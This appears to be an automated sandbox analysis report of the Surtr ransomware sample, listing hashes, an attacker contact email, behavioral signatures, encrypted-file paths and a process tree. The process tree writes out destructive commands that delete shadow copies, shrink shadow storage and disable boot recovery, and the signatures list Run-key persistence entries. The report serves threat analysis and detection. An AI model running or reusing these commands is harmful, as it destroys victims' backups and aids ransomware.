Analysis
- max time kernel: 141s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220112
- submitted: 02-03-2022 08:06
Static task: static1
Behavioral task: behavioral1
- Sample: Surtr.exe
- Resource: win7-20220223-en
Behavioral task: behavioral2
- Sample: Surtr.exe
- Resource: win10v2004-en-20220112
General
- Target: Surtr.exe
- Size: 191KB
- MD5: 664cf36657bf55f20cac44505d3bbb2c
- SHA1: a48f8089455201895757503255d0f573ce5d3c66
- SHA256: 4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35
- SHA512: 42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735
Malware Config
Extracted
- Path: C:\ProgramData\Service\SURTR_README.txt
- Email: Dec_youfile1986@mailfence.com
Extracted
- Path: C:\ProgramData\Service\SURTR_README.hta
- Email: Dec_youfile1986@mailfence.com
Signatures
-
Deletes NTFS Change Journal 2 TTPs
The USN change journal, used by Windows Server systems, is a persistent log of all changes made to local files.
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes (pid, process):
  5712 bcdedit.exe
  5892 bcdedit.exe
-
Processes (pid, process):
  5140 wbadmin.exe
-
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Processes (resource, yara_rule):
  C:\ProgramData\Service\Surtr.exe upx
  C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe upx
  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe upx
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe upx
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes (description, ioc, process):
  Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation (Surtr.exe)
-
Drops startup file 3 IoCs
Processes (description, ioc, process):
  File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe (cmd.exe)
  File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe (attrib.exe)
  File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe (cmd.exe)
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes (description, ioc, process):
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe" (reg.exe)
  Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (reg.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe" (reg.exe)
  Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce (reg.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe" (reg.exe)
  Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce (reg.exe)
  Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe" (reg.exe)
  Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run (reg.exe)
-
Drops desktop.ini file(s) 28 IoCs
Processes (description, ioc, process):
  File opened for modification C:\Users\Admin\Links\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\OneDrive\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Public\Desktop\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Public\Documents\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\Documents\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\Music\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Public\Pictures\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\Downloads\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini (Surtr.exe)
  File opened for modification C:\Program Files\desktop.ini (Surtr.exe)
  File opened for modification C:\Program Files (x86)\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\Saved Games\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\Contacts\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Public\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\Desktop\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\Favorites\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Public\Libraries\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Public\Downloads\desktop.ini (Surtr.exe)
  File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI (Surtr.exe)
  File opened for modification C:\Users\Admin\Pictures\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\Searches\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\Videos\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Public\AccountPictures\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Admin\3D Objects\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Public\Music\desktop.ini (Surtr.exe)
  File opened for modification C:\Users\Public\Videos\desktop.ini (Surtr.exe)
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes (description, ioc, process):
  File opened (read-only) \??\Z: (vssadmin.exe)
  File opened (read-only) \??\G: (Surtr.exe)
  File opened (read-only) \??\A: (Surtr.exe)
  File opened (read-only) \??\F: (vssadmin.exe)
  File opened (read-only) \??\P: (Surtr.exe)
  File opened (read-only) \??\P: (vssadmin.exe)
  File opened (read-only) \??\Q: (vssadmin.exe)
  File opened (read-only) \??\O: (vssadmin.exe)
  File opened (read-only) \??\X: (vssadmin.exe)
  File opened (read-only) \??\E: (vssadmin.exe)
  File opened (read-only) \??\K: (vssadmin.exe)
  File opened (read-only) \??\O: (vssadmin.exe)
  File opened (read-only) \??\Z: (vssadmin.exe)
  File opened (read-only) \??\R: (Surtr.exe)
  File opened (read-only) \??\T: (Surtr.exe)
  File opened (read-only) \??\V: (Surtr.exe)
  File opened (read-only) \??\E: (Surtr.exe)
  File opened (read-only) \??\L: (vssadmin.exe)
  File opened (read-only) \??\H: (vssadmin.exe)
  File opened (read-only) \??\J: (vssadmin.exe)
  File opened (read-only) \??\N: (Surtr.exe)
  File opened (read-only) \??\W: (Surtr.exe)
  File opened (read-only) \??\B: (Surtr.exe)
  File opened (read-only) \??\M: (vssadmin.exe)
  File opened (read-only) \??\N: (vssadmin.exe)
  File opened (read-only) \??\V: (vssadmin.exe)
  File opened (read-only) \??\W: (vssadmin.exe)
  File opened (read-only) \??\K: (Surtr.exe)
  File opened (read-only) \??\G: (vssadmin.exe)
  File opened (read-only) \??\H: (vssadmin.exe)
  File opened (read-only) \??\X: (vssadmin.exe)
  File opened (read-only) \??\B: (vssadmin.exe)
  File opened (read-only) \??\O: (Surtr.exe)
  File opened (read-only) \??\I: (vssadmin.exe)
  File opened (read-only) \??\L: (vssadmin.exe)
  File opened (read-only) \??\E: (vssadmin.exe)
  File opened (read-only) \??\T: (vssadmin.exe)
  File opened (read-only) \??\Y: (Surtr.exe)
  File opened (read-only) \??\R: (vssadmin.exe)
  File opened (read-only) \??\S: (vssadmin.exe)
  File opened (read-only) \??\T: (vssadmin.exe)
  File opened (read-only) \??\U: (vssadmin.exe)
  File opened (read-only) \??\F: (Surtr.exe)
  File opened (read-only) \??\H: (Surtr.exe)
  File opened (read-only) \??\Q: (Surtr.exe)
  File opened (read-only) \??\V: (vssadmin.exe)
  File opened (read-only) \??\A: (vssadmin.exe)
  File opened (read-only) \??\W: (vssadmin.exe)
  File opened (read-only) \??\L: (Surtr.exe)
  File opened (read-only) \??\K: (vssadmin.exe)
  File opened (read-only) \??\J: (vssadmin.exe)
  File opened (read-only) \??\U: (vssadmin.exe)
  File opened (read-only) \??\Y: (vssadmin.exe)
  File opened (read-only) \??\Y: (vssadmin.exe)
  File opened (read-only) \??\A: (vssadmin.exe)
  File opened (read-only) \??\X: (Surtr.exe)
  File opened (read-only) \??\F: (vssadmin.exe)
  File opened (read-only) \??\Q: (vssadmin.exe)
  File opened (read-only) \??\N: (vssadmin.exe)
  File opened (read-only) \??\M: (vssadmin.exe)
  File opened (read-only) \??\M: (Surtr.exe)
  File opened (read-only) \??\U: (Surtr.exe)
  File opened (read-only) \??\I: (vssadmin.exe)
  File opened (read-only) \??\Z: (Surtr.exe)
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow, ioc):
  15 ip-api.com
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes (description, ioc, process):
  Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg" (Surtr.exe)
-
Drops file in Program Files directory 64 IoCs
Processes (description, ioc, process):
  File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTrial-pl.xrm-ms.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\Comb_field_White@1x.png.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\PrivateData_0r6fjlh4j8u4ts.surt (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\ui-strings.js (Surtr.exe)
  File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft SQL Server\SURTR_README.txt (Surtr.exe)
  File created C:\Program Files\VideoLAN\VLC\locale\id\SURTR_README.hta (Surtr.exe)
  File created C:\Program Files\Windows Defender\es-ES\SURTR_README.hta (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\SURTR_README.hta (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\SURTR_README.txt (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\SURTR_README.hta (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_Sign_White@1x.png.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange.xml (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\PrivateData_0r6fjlh4j8u4ts.surt (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lets-get-started-2x.png (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\SURTR_README.txt (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-ma\SURTR_README.hta (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\new_icons.png.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar (Surtr.exe)
  File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\PrivateData_0r6fjlh4j8u4ts.surt (Surtr.exe)
  File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\TimeCard.xltx (Surtr.exe)
  File created C:\Program Files\Mozilla Firefox\browser\VisualElements\SURTR_README.hta (Surtr.exe)
  File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\SURTR_README.txt (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\SURTR_README.txt (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\PrivateData_0r6fjlh4j8u4ts.surt (Surtr.exe)
  File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms (Surtr.exe)
  File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File created C:\Program Files\VideoLAN\VLC\locale\tr\SURTR_README.txt (Surtr.exe)
  File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\Context.snippets.ps1xml (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Viewer.aapp.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\PrivateData_0r6fjlh4j8u4ts.surt (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\bl.gif.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\hr-hr\SURTR_README.txt (Surtr.exe)
  File created C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\SURTR_README.hta (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\ui-strings.js.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\ui-strings.js.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\ui-strings.js.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\SURTR_README.hta (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main-selector.css.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\LICENSE (Surtr.exe)
  File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms (Surtr.exe)
  File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_KMS_ClientC2R-ul-oob.xrm-ms.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_pdf_18.svg.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\SURTR_README.hta (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\bell_empty.png (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\he-il\PrivateData_0r6fjlh4j8u4ts.surt (Surtr.exe)
  File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar (Surtr.exe)
  File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTest-ul-oob.xrm-ms (Surtr.exe)
  File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLMF.DLL (Surtr.exe)
  File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac (Surtr.exe)
  File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\he-il\SURTR_README.txt (Surtr.exe)
  File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\main.css (Surtr.exe)
  File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar (Surtr.exe)
  File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar (Surtr.exe)
  File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ul-oob.xrm-ms (Surtr.exe)
  File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp2-ul-oob.xrm-ms.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr (Surtr.exe)
  File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\PrivateData_0r6fjlh4j8u4ts.surt (Surtr.exe)
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes (description, ioc, process):
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 (vds.exe)
  Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName (vds.exe)
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 (vds.exe)
  Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName (vds.exe)
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid, process):
  5172 schtasks.exe
  5328 schtasks.exe
  5268 schtasks.exe
-
Interacts with shadow copies 2 TTPs 52 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes (pid, process): 52 instances of vssadmin.exe with PIDs
  4620, 6160, 6844, 7512, 7596, 7588, 7384, 6324, 4264, 6024, 7416, 7652, 7900,
  7868, 8020, 1896, 5684, 6916, 7876, 8168, 5488, 4504, 5676, 7304, 7604, 8176,
  4060, 4176, 4204, 2796, 5900, 6880, 7552, 7884, 7800, 7396, 7424, 7752, 7780,
  4804, 5724, 7504, 7228, 7792, 4616, 6800, 7472, 7524, 7568, 4128, 8088, 4756
-
Modifies registry class 6 IoCs
Processes (description, ioc, process):
  Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\MuiCache (StartMenuExperienceHost.exe)
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.surtr (reg.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.surtr\ = "surtr_auto_file" (reg.exe)
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file\DefaultIcon (reg.exe)
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file (reg.exe)
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico" (reg.exe)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (pid, process):
  3600 Surtr.exe (64 identical entries)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes (pid, process):
  3600 Surtr.exe
-
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes (description, pid, process):
  Token: SeBackupPrivilege 6952 vssvc.exe
  Token: SeRestorePrivilege 6952 vssvc.exe
  Token: SeAuditPrivilege 6952 vssvc.exe
  Token: SeBackupPrivilege 7288 wbengine.exe
  Token: SeRestorePrivilege 7288 wbengine.exe
  Token: SeSecurityPrivilege 7288 wbengine.exe
  Token: SeSecurityPrivilege 5540 wevtutil.exe
  Token: SeBackupPrivilege 5540 wevtutil.exe
  Token: SeSecurityPrivilege 7196 wevtutil.exe
  Token: SeBackupPrivilege 7196 wevtutil.exe
  Token: SeSecurityPrivilege 1904 wevtutil.exe
  Token: SeBackupPrivilege 1904 wevtutil.exe
  Token: SeSecurityPrivilege 5276 wevtutil.exe
  Token: SeBackupPrivilege 5276 wevtutil.exe
  Token: SeSecurityPrivilege 6280 wevtutil.exe
  Token: SeBackupPrivilege 6280 wevtutil.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes (pid, process):
  6336 StartMenuExperienceHost.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (description, pid, process, target process); repeated entries are collapsed with their count:
  PID 3600 wrote to memory of 680 (3600 Surtr.exe -> cmd.exe) x3
  PID 3600 wrote to memory of 4044 (3600 Surtr.exe -> cmd.exe) x3
  PID 3600 wrote to memory of 2404 (3600 Surtr.exe -> cmd.exe) x3
  PID 2404 wrote to memory of 1840 (2404 cmd.exe -> chcp.com) x3
  PID 3600 wrote to memory of 1920 (3600 Surtr.exe -> cmd.exe) x3
  PID 3600 wrote to memory of 3912 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 2992 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 1972 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 1896 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 3024 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 2096 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 3696 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 3384 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 1764 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 3584 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 3352 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 100 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 1420 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 644 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 756 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 3968 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 2268 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 4112 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 4120 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 4128 (3600 Surtr.exe -> vssadmin.exe) x2
  PID 3600 wrote to memory of 4180 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 4232 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 4240 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 4316 (3600 Surtr.exe -> cmd.exe) x2
  PID 3600 wrote to memory of 4324 (3600 Surtr.exe -> cmd.exe) x1
-
Views/modifies file attributes 1 TTPs 8 IoCs
Processes (pid, process):
  1812 attrib.exe
  6064 attrib.exe
  5472 attrib.exe
  5720 attrib.exe
  4964 attrib.exe
  4888 attrib.exe
  4696 attrib.exe
  5264 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Surtr.exe (level 1)
command line: "C:\Users\Admin\AppData\Local\Temp\Surtr.exe"
- Checks computer location settings
- Drops desktop.ini file(s)
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe (level 2)
command line: C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
-
C:\Windows\SysWOW64\cmd.exe (level 2)
command line: C:\Windows\system32\cmd.exe /c @echo off
-
C:\Windows\SysWOW64\cmd.exe (level 2)
command line: C:\Windows\system32\cmd.exe /c chcp 437
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.com (level 3)
command line: chcp 437
-
C:\Windows\SysWOW64\cmd.exe (level 2)
command line: C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
-
C:\Windows\system32\vssadmin.exe (level 3)
command line: vssadmin.exe Delete Shadows /all /quiet
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
-
C:\Windows\system32\vssadmin.exe (level 3)
command line: vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
- Interacts with shadow copies
-
C:\Windows\System32\cmd.exe (level 2)
command line: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
-
C:\Windows\system32\bcdedit.exe (level 3)
command line: bcdedit /set {default} recoveryenabled No
- Modifies boot configuration data using bcdedit
